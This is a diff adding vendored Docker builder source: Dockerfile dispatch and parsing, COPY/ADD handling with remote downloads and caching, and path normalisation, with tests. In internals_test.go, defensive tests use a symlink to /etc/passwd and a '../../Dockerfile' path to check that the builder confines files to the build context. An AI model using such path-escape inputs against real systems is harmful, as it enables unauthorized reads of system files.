+		}}
+
+	return dispatchTestCases
+}
+
+func TestDispatch(t *testing.T) {
+	testCases := initDispatchTestCases()
+
+	for _, testCase := range testCases {
+		executeTestCase(t, testCase)
+	}
+}
+
+func executeTestCase(t *testing.T, testCase dispatchTestCase) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test")
+	defer cleanup()
+
+	for filename, content := range testCase.files {
+		createTestTempFile(t, contextDir, filename, content, 0777)
+	}
+
+	tarStream, err := archive.Tar(contextDir, archive.Uncompressed)
+
+	if err != nil {
+		t.Fatalf("Error when creating tar stream: %s", err)
+	}
+
+	defer func() {
+		if err = tarStream.Close(); err != nil {
+			t.Fatalf("Error when closing tar stream: %s", err)
+		}
+	}()
+
+	context, err := builder.MakeTarSumContext(tarStream)
+
+	if err != nil {
+		t.Fatalf("Error when creating tar context: %s", err)
+	}
+
+	defer func() {
+		if err = context.Close(); err != nil {
+			t.Fatalf("Error when closing tar context: %s", err)
+		}
+	}()
+
+	r := strings.NewReader(testCase.dockerfile)
+	d := parser.Directive{}
+	parser.SetEscapeToken(parser.DefaultEscapeToken, &d)
+	n, err := parser.Parse(r, &d)
+
+	if err != nil {
+		t.Fatalf("Error when parsing Dockerfile: %s", err)
+	}
+
+	config := &container.Config{}
+	options := &types.ImageBuildOptions{}
+
+	b := &Builder{runConfig: config, options: options, Stdout: ioutil.Discard, context: context}
+
+	err = b.dispatch(0, len(n.Children), n.Children[0])
+
+	if err == nil {
+		t.Fatalf("No error when executing test %s", testCase.name)
+	}
+
+	if !strings.Contains(err.Error(), testCase.expectedError) {
+		t.Fatalf("Wrong error message. Should be \"%s\". Got \"%s\"", testCase.expectedError, err.Error())
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go
new file mode 100644
index 0000000000..28fd5b156b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go
@@ -0,0 +1,9 @@
+// +build !windows
+
+package dockerfile
+
+// platformSupports is a short-term function to give users a quality error
+// message if a Dockerfile uses a command not supported on the platform.
+func platformSupports(command string) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go
new file mode 100644
index 0000000000..72483a2ec8
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go
@@ -0,0 +1,13 @@
+package dockerfile
+
+import "fmt"
+
+// platformSupports is gives users a quality error message if a Dockerfile uses
+// a command not supported on the platform.
+func platformSupports(command string) error {
+	switch command {
+	case "stopsignal":
+		return fmt.Errorf("The daemon on this platform does not support the command '%s'", command)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals.go b/vendor/github.com/docker/docker/builder/dockerfile/internals.go
new file mode 100644
index 0000000000..6f0a367842
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/internals.go
@@ -0,0 +1,669 @@
+package dockerfile
+
+// internals for handling commands. Covers many areas and a lot of
+// non-contiguous functionality. Please read the comments.
+
+import (
+	"crypto/sha256"
+	"encoding/hex"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"net/url"
+	"os"
+	"path/filepath"
+	"sort"
+	"strings"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/builder/dockerfile/parser"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/httputils"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/pkg/tarsum"
+	"github.com/docker/docker/pkg/urlutil"
+	"github.com/docker/docker/runconfig/opts"
+)
+
+func (b *Builder) commit(id string, autoCmd strslice.StrSlice, comment string) error {
+	if b.disableCommit {
+		return nil
+	}
+	if b.image == "" && !b.noBaseImage {
+		return fmt.Errorf("Please provide a source image with `from` prior to commit")
+	}
+	b.runConfig.Image = b.image
+
+	if id == "" {
+		cmd := b.runConfig.Cmd
+		b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), "#(nop) ", comment))
+		defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd)
+
+		hit, err := b.probeCache()
+		if err != nil {
+			return err
+		} else if hit {
+			return nil
+		}
+		id, err = b.create()
+		if err != nil {
+			return err
+		}
+	}
+
+	// Note: Actually copy the struct
+	autoConfig := *b.runConfig
+	autoConfig.Cmd = autoCmd
+
+	commitCfg := &backend.ContainerCommitConfig{
+		ContainerCommitConfig: types.ContainerCommitConfig{
+			Author: b.maintainer,
+			Pause:  true,
+			Config: &autoConfig,
+		},
+	}
+
+	// Commit the container
+	imageID, err := b.docker.Commit(id, commitCfg)
+	if err != nil {
+		return err
+	}
+
+	b.image = imageID
+	return nil
+}
+
+type copyInfo struct {
+	builder.FileInfo
+	decompress bool
+}
+
+func (b *Builder) runContextCommand(args []string, allowRemote bool, allowLocalDecompression bool, cmdName string) error {
+	if b.context == nil {
+		return fmt.Errorf("No context given. Impossible to use %s", cmdName)
+	}
+
+	if len(args) < 2 {
+		return fmt.Errorf("Invalid %s format - at least two arguments required", cmdName)
+	}
+
+	// Work in daemon-specific filepath semantics
+	dest := filepath.FromSlash(args[len(args)-1]) // last one is always the dest
+
+	b.runConfig.Image = b.image
+
+	var infos []copyInfo
+
+	// Loop through each src file and calculate the info we need to
+	// do the copy (e.g. hash value if cached).  Don't actually do
+	// the copy until we've looked at all src files
+	var err error
+	for _, orig := range args[0 : len(args)-1] {
+		var fi builder.FileInfo
+		decompress := allowLocalDecompression
+		if urlutil.IsURL(orig) {
+			if !allowRemote {
+				return fmt.Errorf("Source can't be a URL for %s", cmdName)
+			}
+			fi, err = b.download(orig)
+			if err != nil {
+				return err
+			}
+			defer os.RemoveAll(filepath.Dir(fi.Path()))
+			decompress = false
+			infos = append(infos, copyInfo{fi, decompress})
+			continue
+		}
+		// not a URL
+		subInfos, err := b.calcCopyInfo(cmdName, orig, allowLocalDecompression, true)
+		if err != nil {
+			return err
+		}
+
+		infos = append(infos, subInfos...)
+	}
+
+	if len(infos) == 0 {
+		return fmt.Errorf("No source files were specified")
+	}
+	if len(infos) > 1 && !strings.HasSuffix(dest, string(os.PathSeparator)) {
+		return fmt.Errorf("When using %s with more than one source file, the destination must be a directory and end with a /", cmdName)
+	}
+
+	// For backwards compat, if there's just one info then use it as the
+	// cache look-up string, otherwise hash 'em all into one
+	var srcHash string
+	var origPaths string
+
+	if len(infos) == 1 {
+		fi := infos[0].FileInfo
+		origPaths = fi.Name()
+		if hfi, ok := fi.(builder.Hashed); ok {
+			srcHash = hfi.Hash()
+		}
+	} else {
+		var hashs []string
+		var origs []string
+		for _, info := range infos {
+			fi := info.FileInfo
+			origs = append(origs, fi.Name())
+			if hfi, ok := fi.(builder.Hashed); ok {
+				hashs = append(hashs, hfi.Hash())
+			}
+		}
+		hasher := sha256.New()
+		hasher.Write([]byte(strings.Join(hashs, ",")))
+		srcHash = "multi:" + hex.EncodeToString(hasher.Sum(nil))
+		origPaths = strings.Join(origs, " ")
+	}
+
+	cmd := b.runConfig.Cmd
+	b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), fmt.Sprintf("#(nop) %s %s in %s ", cmdName, srcHash, dest)))
+	defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd)
+
+	if hit, err := b.probeCache(); err != nil {
+		return err
+	} else if hit {
+		return nil
+	}
+
+	container, err := b.docker.ContainerCreate(types.ContainerCreateConfig{Config: b.runConfig})
+	if err != nil {
+		return err
+	}
+	b.tmpContainers[container.ID] = struct{}{}
+
+	comment := fmt.Sprintf("%s %s in %s", cmdName, origPaths, dest)
+
+	// Twiddle the destination when its a relative path - meaning, make it
+	// relative to the WORKINGDIR
+	if dest, err = normaliseDest(cmdName, b.runConfig.WorkingDir, dest); err != nil {
+		return err
+	}
+
+	for _, info := range infos {
+		if err := b.docker.CopyOnBuild(container.ID, dest, info.FileInfo, info.decompress); err != nil {
+			return err
+		}
+	}
+
+	return b.commit(container.ID, cmd, comment)
+}
+
+func (b *Builder) download(srcURL string) (fi builder.FileInfo, err error) {
+	// get filename from URL
+	u, err := url.Parse(srcURL)
+	if err != nil {
+		return
+	}
+	path := filepath.FromSlash(u.Path) // Ensure in platform semantics
+	if strings.HasSuffix(path, string(os.PathSeparator)) {
+		path = path[:len(path)-1]
+	}
+	parts := strings.Split(path, string(os.PathSeparator))
+	filename := parts[len(parts)-1]
+	if filename == "" {
+		err = fmt.Errorf("cannot determine filename from url: %s", u)
+		return
+	}
+
+	// Initiate the download
+	resp, err := httputils.Download(srcURL)
+	if err != nil {
+		return
+	}
+
+	// Prepare file in a tmp dir
+	tmpDir, err := ioutils.TempDir("", "docker-remote")
+	if err != nil {
+		return
+	}
+	defer func() {
+		if err != nil {
+			os.RemoveAll(tmpDir)
+		}
+	}()
+	tmpFileName := filepath.Join(tmpDir, filename)
+	tmpFile, err := os.OpenFile(tmpFileName, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600)
+	if err != nil {
+		return
+	}
+
+	stdoutFormatter := b.Stdout.(*streamformatter.StdoutFormatter)
+	progressOutput := stdoutFormatter.StreamFormatter.NewProgressOutput(stdoutFormatter.Writer, true)
+	progressReader := progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Downloading")
+	// Download and dump result to tmp file
+	if _, err = io.Copy(tmpFile, progressReader); err != nil {
+		tmpFile.Close()
+		return
+	}
+	fmt.Fprintln(b.Stdout)
+	// ignoring error because the file was already opened successfully
+	tmpFileSt, err := tmpFile.Stat()
+	if err != nil {
+		tmpFile.Close()
+		return
+	}
+
+	// Set the mtime to the Last-Modified header value if present
+	// Otherwise just remove atime and mtime
+	mTime := time.Time{}
+
+	lastMod := resp.Header.Get("Last-Modified")
+	if lastMod != "" {
+		// If we can't parse it then just let it default to 'zero'
+		// otherwise use the parsed time value
+		if parsedMTime, err := http.ParseTime(lastMod); err == nil {
+			mTime = parsedMTime
+		}
+	}
+
+	tmpFile.Close()
+
+	if err = system.Chtimes(tmpFileName, mTime, mTime); err != nil {
+		return
+	}
+
+	// Calc the checksum, even if we're using the cache
+	r, err := archive.Tar(tmpFileName, archive.Uncompressed)
+	if err != nil {
+		return
+	}
+	tarSum, err := tarsum.NewTarSum(r, true, tarsum.Version1)
+	if err != nil {
+		return
+	}
+	if _, err = io.Copy(ioutil.Discard, tarSum); err != nil {
+		return
+	}
+	hash := tarSum.Sum(nil)
+	r.Close()
+	return &builder.HashedFileInfo{FileInfo: builder.PathFileInfo{FileInfo: tmpFileSt, FilePath: tmpFileName}, FileHash: hash}, nil
+}
+
+func (b *Builder) calcCopyInfo(cmdName, origPath string, allowLocalDecompression, allowWildcards bool) ([]copyInfo, error) {
+
+	// Work in daemon-specific OS filepath semantics
+	origPath = filepath.FromSlash(origPath)
+
+	if origPath != "" && origPath[0] == os.PathSeparator && len(origPath) > 1 {
+		origPath = origPath[1:]
+	}
+	origPath = strings.TrimPrefix(origPath, "."+string(os.PathSeparator))
+
+	// Deal with wildcards
+	if allowWildcards && containsWildcards(origPath) {
+		var copyInfos []copyInfo
+		if err := b.context.Walk("", func(path string, info builder.FileInfo, err error) error {
+			if err != nil {
+				return err
+			}
+			if info.Name() == "" {
+				// Why are we doing this check?
+				return nil
+			}
+			if match, _ := filepath.Match(origPath, path); !match {
+				return nil
+			}
+
+			// Note we set allowWildcards to false in case the name has
+			// a * in it
+			subInfos, err := b.calcCopyInfo(cmdName, path, allowLocalDecompression, false)
+			if err != nil {
+				return err
+			}
+			copyInfos = append(copyInfos, subInfos...)
+			return nil
+		}); err != nil {
+			return nil, err
+		}
+		return copyInfos, nil
+	}
+
+	// Must be a dir or a file
+
+	statPath, fi, err := b.context.Stat(origPath)
+	if err != nil {
+		return nil, err
+	}
+
+	copyInfos := []copyInfo{{FileInfo: fi, decompress: allowLocalDecompression}}
+
+	hfi, handleHash := fi.(builder.Hashed)
+	if !handleHash {
+		return copyInfos, nil
+	}
+
+	// Deal with the single file case
+	if !fi.IsDir() {
+		hfi.SetHash("file:" + hfi.Hash())
+		return copyInfos, nil
+	}
+	// Must be a dir
+	var subfiles []string
+	err = b.context.Walk(statPath, func(path string, info builder.FileInfo, err error) error {
+		if err != nil {
+			return err
+		}
+		// we already checked handleHash above
+		subfiles = append(subfiles, info.(builder.Hashed).Hash())
+		return nil
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	sort.Strings(subfiles)
+	hasher := sha256.New()
+	hasher.Write([]byte(strings.Join(subfiles, ",")))
+	hfi.SetHash("dir:" + hex.EncodeToString(hasher.Sum(nil)))
+
+	return copyInfos, nil
+}
+
+func (b *Builder) processImageFrom(img builder.Image) error {
+	if img != nil {
+		b.image = img.ImageID()
+
+		if img.RunConfig() != nil {
+			b.runConfig = img.RunConfig()
+		}
+	}
+
+	// Check to see if we have a default PATH, note that windows won't
+	// have one as its set by HCS
+	if system.DefaultPathEnv != "" {
+		// Convert the slice of strings that represent the current list
+		// of env vars into a map so we can see if PATH is already set.
+		// If its not set then go ahead and give it our default value
+		configEnv := opts.ConvertKVStringsToMap(b.runConfig.Env)
+		if _, ok := configEnv["PATH"]; !ok {
+			b.runConfig.Env = append(b.runConfig.Env,
+				"PATH="+system.DefaultPathEnv)
+		}
+	}
+
+	if img == nil {
+		// Typically this means they used "FROM scratch"
+		return nil
+	}
+
+	// Process ONBUILD triggers if they exist
+	if nTriggers := len(b.runConfig.OnBuild); nTriggers != 0 {
+		word := "trigger"
+		if nTriggers > 1 {
+			word = "triggers"
+		}
+		fmt.Fprintf(b.Stderr, "# Executing %d build %s...\n", nTriggers, word)
+	}
+
+	// Copy the ONBUILD triggers, and remove them from the config, since the config will be committed.
+	onBuildTriggers := b.runConfig.OnBuild
+	b.runConfig.OnBuild = []string{}
+
+	// parse the ONBUILD triggers by invoking the parser
+	for _, step := range onBuildTriggers {
+		ast, err := parser.Parse(strings.NewReader(step), &b.directive)
+		if err != nil {
+			return err
+		}
+
+		total := len(ast.Children)
+		for _, n := range ast.Children {
+			if err := b.checkDispatch(n, true); err != nil {
+				return err
+			}
+		}
+		for i, n := range ast.Children {
+			if err := b.dispatch(i, total, n); err != nil {
+				return err
+			}
+		}
+	}
+
+	return nil
+}
+
+// probeCache checks if cache match can be found for current build instruction.
+// If an image is found, probeCache returns `(true, nil)`.
+// If no image is found, it returns `(false, nil)`.
+// If there is any error, it returns `(false, err)`.
+func (b *Builder) probeCache() (bool, error) {
+	c := b.imageCache
+	if c == nil || b.options.NoCache || b.cacheBusted {
+		return false, nil
+	}
+	cache, err := c.GetCache(b.image, b.runConfig)
+	if err != nil {
+		return false, err
+	}
+	if len(cache) == 0 {
+		logrus.Debugf("[BUILDER] Cache miss: %s", b.runConfig.Cmd)
+		b.cacheBusted = true
+		return false, nil
+	}
+
+	fmt.Fprintf(b.Stdout, " ---> Using cache\n")
+	logrus.Debugf("[BUILDER] Use cached version: %s", b.runConfig.Cmd)
+	b.image = string(cache)
+
+	return true, nil
+}
+
+func (b *Builder) create() (string, error) {
+	if b.image == "" && !b.noBaseImage {
+		return "", fmt.Errorf("Please provide a source image with `from` prior to run")
+	}
+	b.runConfig.Image = b.image
+
+	resources := container.Resources{
+		CgroupParent: b.options.CgroupParent,
+		CPUShares:    b.options.CPUShares,
+		CPUPeriod:    b.options.CPUPeriod,
+		CPUQuota:     b.options.CPUQuota,
+		CpusetCpus:   b.options.CPUSetCPUs,
+		CpusetMems:   b.options.CPUSetMems,
+		Memory:       b.options.Memory,
+		MemorySwap:   b.options.MemorySwap,
+		Ulimits:      b.options.Ulimits,
+	}
+
+	// TODO: why not embed a hostconfig in builder?
+	hostConfig := &container.HostConfig{
+		SecurityOpt: b.options.SecurityOpt,
+		Isolation:   b.options.Isolation,
+		ShmSize:     b.options.ShmSize,
+		Resources:   resources,
+		NetworkMode: container.NetworkMode(b.options.NetworkMode),
+	}
+
+	config := *b.runConfig
+
+	// Create the container
+	c, err := b.docker.ContainerCreate(types.ContainerCreateConfig{
+		Config:     b.runConfig,
+		HostConfig: hostConfig,
+	})
+	if err != nil {
+		return "", err
+	}
+	for _, warning := range c.Warnings {
+		fmt.Fprintf(b.Stdout, " ---> [Warning] %s\n", warning)
+	}
+
+	b.tmpContainers[c.ID] = struct{}{}
+	fmt.Fprintf(b.Stdout, " ---> Running in %s\n", stringid.TruncateID(c.ID))
+
+	// override the entry point that may have been picked up from the base image
+	if err := b.docker.ContainerUpdateCmdOnBuild(c.ID, config.Cmd); err != nil {
+		return "", err
+	}
+
+	return c.ID, nil
+}
+
+var errCancelled = errors.New("build cancelled")
+
+func (b *Builder) run(cID string) (err error) {
+	errCh := make(chan error)
+	go func() {
+		errCh <- b.docker.ContainerAttachRaw(cID, nil, b.Stdout, b.Stderr, true)
+	}()
+
+	finished := make(chan struct{})
+	cancelErrCh := make(chan error, 1)
+	go func() {
+		select {
+		case <-b.clientCtx.Done():
+			logrus.Debugln("Build cancelled, killing and removing container:", cID)
+			b.docker.ContainerKill(cID, 0)
+			b.removeContainer(cID)
+			cancelErrCh <- errCancelled
+		case <-finished:
+			cancelErrCh <- nil
+		}
+	}()
+
+	if err := b.docker.ContainerStart(cID, nil, "", ""); err != nil {
+		close(finished)
+		if cancelErr := <-cancelErrCh; cancelErr != nil {
+			logrus.Debugf("Build cancelled (%v) and got an error from ContainerStart: %v",
+				cancelErr, err)
+		}
+		return err
+	}
+
+	// Block on reading output from container, stop on err or chan closed
+	if err := <-errCh; err != nil {
+		close(finished)
+		if cancelErr := <-cancelErrCh; cancelErr != nil {
+			logrus.Debugf("Build cancelled (%v) and got an error from errCh: %v",
+				cancelErr, err)
+		}
+		return err
+	}
+
+	if ret, _ := b.docker.ContainerWait(cID, -1); ret != 0 {
+		close(finished)
+		if cancelErr := <-cancelErrCh; cancelErr != nil {
+			logrus.Debugf("Build cancelled (%v) and got a non-zero code from ContainerWait: %d",
+				cancelErr, ret)
+		}
+		// TODO: change error type, because jsonmessage.JSONError assumes HTTP
+		return &jsonmessage.JSONError{
+			Message: fmt.Sprintf("The command '%s' returned a non-zero code: %d", strings.Join(b.runConfig.Cmd, " "), ret),
+			Code:    ret,
+		}
+	}
+	close(finished)
+	return <-cancelErrCh
+}
+
+func (b *Builder) removeContainer(c string) error {
+	rmConfig := &types.ContainerRmConfig{
+		ForceRemove:  true,
+		RemoveVolume: true,
+	}
+	if err := b.docker.ContainerRm(c, rmConfig); err != nil {
+		fmt.Fprintf(b.Stdout, "Error removing intermediate container %s: %v\n", stringid.TruncateID(c), err)
+		return err
+	}
+	return nil
+}
+
+func (b *Builder) clearTmp() {
+	for c := range b.tmpContainers {
+		if err := b.removeContainer(c); err != nil {
+			return
+		}
+		delete(b.tmpContainers, c)
+		fmt.Fprintf(b.Stdout, "Removing intermediate container %s\n", stringid.TruncateID(c))
+	}
+}
+
+// readDockerfile reads a Dockerfile from the current context.
+func (b *Builder) readDockerfile() error {
+	// If no -f was specified then look for 'Dockerfile'. If we can't find
+	// that then look for 'dockerfile'.  If neither are found then default
+	// back to 'Dockerfile' and use that in the error message.
+	if b.options.Dockerfile == "" {
+		b.options.Dockerfile = builder.DefaultDockerfileName
+		if _, _, err := b.context.Stat(b.options.Dockerfile); os.IsNotExist(err) {
+			lowercase := strings.ToLower(b.options.Dockerfile)
+			if _, _, err := b.context.Stat(lowercase); err == nil {
+				b.options.Dockerfile = lowercase
+			}
+		}
+	}
+
+	err := b.parseDockerfile()
+
+	if err != nil {
+		return err
+	}
+
+	// After the Dockerfile has been parsed, we need to check the .dockerignore
+	// file for either "Dockerfile" or ".dockerignore", and if either are
+	// present then erase them from the build context. These files should never
+	// have been sent from the client but we did send them to make sure that
+	// we had the Dockerfile to actually parse, and then we also need the
+	// .dockerignore file to know whether either file should be removed.
+	// Note that this assumes the Dockerfile has been read into memory and
+	// is now safe to be removed.
+	if dockerIgnore, ok := b.context.(builder.DockerIgnoreContext); ok {
+		dockerIgnore.Process([]string{b.options.Dockerfile})
+	}
+	return nil
+}
+
+func (b *Builder) parseDockerfile() error {
+	f, err := b.context.Open(b.options.Dockerfile)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return fmt.Errorf("Cannot locate specified Dockerfile: %s", b.options.Dockerfile)
+		}
+		return err
+	}
+	defer f.Close()
+	if f, ok := f.(*os.File); ok {
+		// ignoring error because Open already succeeded
+		fi, err := f.Stat()
+		if err != nil {
+			return fmt.Errorf("Unexpected error reading Dockerfile: %v", err)
+		}
+		if fi.Size() == 0 {
+			return fmt.Errorf("The Dockerfile (%s) cannot be empty", b.options.Dockerfile)
+		}
+	}
+	b.dockerfile, err = parser.Parse(f, &b.directive)
+	if err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// determine if build arg is part of built-in args or user
+// defined args in Dockerfile at any point in time.
+func (b *Builder) isBuildArgAllowed(arg string) bool {
+	if _, ok := BuiltinAllowedBuildArgs[arg]; ok {
+		return true
+	}
+	if _, ok := b.allowedBuildArgs[arg]; ok {
+		return true
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go
new file mode 100644
index 0000000000..d170d8e25a
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go
@@ -0,0 +1,95 @@
+package dockerfile
+
+import (
+	"fmt"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/pkg/archive"
+)
+
+func TestEmptyDockerfile(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test")
+	defer cleanup()
+
+	createTestTempFile(t, contextDir, builder.DefaultDockerfileName, "", 0777)
+
+	readAndCheckDockerfile(t, "emptyDockefile", contextDir, "", "The Dockerfile (Dockerfile) cannot be empty")
+}
+
+func TestSymlinkDockerfile(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test")
+	defer cleanup()
+
+	createTestSymlink(t, contextDir, builder.DefaultDockerfileName, "/etc/passwd")
+
+	// The reason the error is "Cannot locate specified Dockerfile" is because
+	// in the builder, the symlink is resolved within the context, therefore
+	// Dockerfile -> /etc/passwd becomes etc/passwd from the context which is
+	// a nonexistent file.
+	expectedError := fmt.Sprintf("Cannot locate specified Dockerfile: %s", builder.DefaultDockerfileName)
+
+	readAndCheckDockerfile(t, "symlinkDockerfile", contextDir, builder.DefaultDockerfileName, expectedError)
+}
+
+func TestDockerfileOutsideTheBuildContext(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test")
+	defer cleanup()
+
+	expectedError := "Forbidden path outside the build context"
+
+	readAndCheckDockerfile(t, "DockerfileOutsideTheBuildContext", contextDir, "../../Dockerfile", expectedError)
+}
+
+func TestNonExistingDockerfile(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test")
+	defer cleanup()
+
+	expectedError := "Cannot locate specified Dockerfile: Dockerfile"
+
+	readAndCheckDockerfile(t, "NonExistingDockerfile", contextDir, "Dockerfile", expectedError)
+}
+
+func readAndCheckDockerfile(t *testing.T, testName, contextDir, dockerfilePath, expectedError string) {
+	tarStream, err := archive.Tar(contextDir, archive.Uncompressed)
+
+	if err != nil {
+		t.Fatalf("Error when creating tar stream: %s", err)
+	}
+
+	defer func() {
+		if err = tarStream.Close(); err != nil {
+			t.Fatalf("Error when closing tar stream: %s", err)
+		}
+	}()
+
+	context, err := builder.MakeTarSumContext(tarStream)
+
+	if err != nil {
+		t.Fatalf("Error when creating tar context: %s", err)
+	}
+
+	defer func() {
+		if err = context.Close(); err != nil {
+			t.Fatalf("Error when closing tar context: %s", err)
+		}
+	}()
+
+	options := &types.ImageBuildOptions{
+		Dockerfile: dockerfilePath,
+	}
+
+	b := &Builder{options: options, context: context}
+
+	err = b.readDockerfile()
+
+	if err == nil {
+		t.Fatalf("No error when executing test: %s", testName)
+	}
+
+	if !strings.Contains(err.Error(), expectedError) {
+		t.Fatalf("Wrong error message. Should be \"%s\". Got \"%s\"", expectedError, err.Error())
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go
new file mode 100644
index 0000000000..a8a47c3582
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go
@@ -0,0 +1,38 @@
+// +build !windows
+
+package dockerfile
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+// normaliseDest normalises the destination of a COPY/ADD command in a
+// platform semantically consistent way.
+func normaliseDest(cmdName, workingDir, requested string) (string, error) {
+	dest := filepath.FromSlash(requested)
+	endsInSlash := strings.HasSuffix(requested, string(os.PathSeparator))
+	if !system.IsAbs(requested) {
+		dest = filepath.Join(string(os.PathSeparator), filepath.FromSlash(workingDir), dest)
+		// Make sure we preserve any trailing slash
+		if endsInSlash {
+			dest += string(os.PathSeparator)
+		}
+	}
+	return dest, nil
+}
+
+func containsWildcards(name string) bool {
+	for i := 0; i < len(name); i++ {
+		ch := name[i]
+		if ch == '\\' {
+			i++
+		} else if ch == '*' || ch == '?' || ch == '[' {
+			return true
+		}
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go
new file mode 100644
index 0000000000..f60b112049
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go
@@ -0,0 +1,66 @@
+package dockerfile
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+// normaliseDest normalises the destination of a COPY/ADD command in a
+// platform semantically consistent way.
+func normaliseDest(cmdName, workingDir, requested string) (string, error) {
+	dest := filepath.FromSlash(requested)
+	endsInSlash := strings.HasSuffix(dest, string(os.PathSeparator))
+
+	// We are guaranteed that the working directory is already consistent,
+	// However, Windows also has, for now, the limitation that ADD/COPY can
+	// only be done to the system drive, not any drives that might be present
+	// as a result of a bind mount.
+	//
+	// So... if the path requested is Linux-style absolute (/foo or \\foo),
+	// we assume it is the system drive. If it is a Windows-style absolute
+	// (DRIVE:\\foo), error if DRIVE is not C. And finally, ensure we
+	// strip any configured working directories drive letter so that it
+	// can be subsequently legitimately converted to a Windows volume-style
+	// pathname.
+
+	// Not a typo - filepath.IsAbs, not system.IsAbs on this next check as
+	// we only want to validate where the DriveColon part has been supplied.
+	if filepath.IsAbs(dest) {
+		if strings.ToUpper(string(dest[0])) != "C" {
+			return "", fmt.Errorf("Windows does not support %s with a destinations not on the system drive (C:)", cmdName)
+		}
+		dest = dest[2:] // Strip the drive letter
+	}
+
+	// Cannot handle relative where WorkingDir is not the system drive.
+	if len(workingDir) > 0 {
+		if ((len(workingDir) > 1) && !system.IsAbs(workingDir[2:])) || (len(workingDir) == 1) {
+			return "", fmt.Errorf("Current WorkingDir %s is not platform consistent", workingDir)
+		}
+		if !system.IsAbs(dest) {
+			if string(workingDir[0]) != "C" {
+				return "", fmt.Errorf("Windows does not support %s with relative paths when WORKDIR is not the system drive", cmdName)
+			}
+			dest = filepath.Join(string(os.PathSeparator), workingDir[2:], dest)
+			// Make sure we preserve any trailing slash
+			if endsInSlash {
+				dest += string(os.PathSeparator)
+			}
+		}
+	}
+	return dest, nil
+}
+
+func containsWildcards(name string) bool {
+	for i := 0; i < len(name); i++ {
+		ch := name[i]
+		if ch == '*' || ch == '?' || ch == '[' {
+			return true
+		}
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go
new file mode 100644
index 0000000000..868a6671a3
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go
@@ -0,0 +1,51 @@
+// +build windows
+
+package dockerfile
+
+import "testing"
+
+func TestNormaliseDest(t *testing.T) {
+	tests := []struct{ current, requested, expected, etext string }{
+		{``, `D:\`, ``, `Windows does not support TEST with a destinations not on the system drive (C:)`},
+		{``, `e:/`, ``, `Windows does not support TEST with a destinations not on the system drive (C:)`},
+		{`invalid`, `./c1`, ``, `Current WorkingDir invalid is not platform consistent`},
+		{`C:`, ``, ``, `Current WorkingDir C: is not platform consistent`},
+		{`C`, ``, ``, `Current WorkingDir C is not platform consistent`},
+		{`D:\`, `.`, ``, "Windows does not support TEST with relative paths when WORKDIR is not the system drive"},
+		{``, `D`, `D`, ``},
+		{``, `./a1`, `.\a1`, ``},
+		{``, `.\b1`, `.\b1`, ``},
+		{``, `/`, `\`, ``},
+		{``, `\`, `\`, ``},
+		{``, `c:/`, `\`, ``},
+		{``, `c:\`, `\`, ``},
+		{``, `.`, `.`, ``},
+		{`C:\wdd`, `./a1`, `\wdd\a1`, ``},
+		{`C:\wde`, `.\b1`, `\wde\b1`, ``},
+		{`C:\wdf`, `/`, `\`, ``},
+		{`C:\wdg`, `\`, `\`, ``},
+		{`C:\wdh`, `c:/`, `\`, ``},
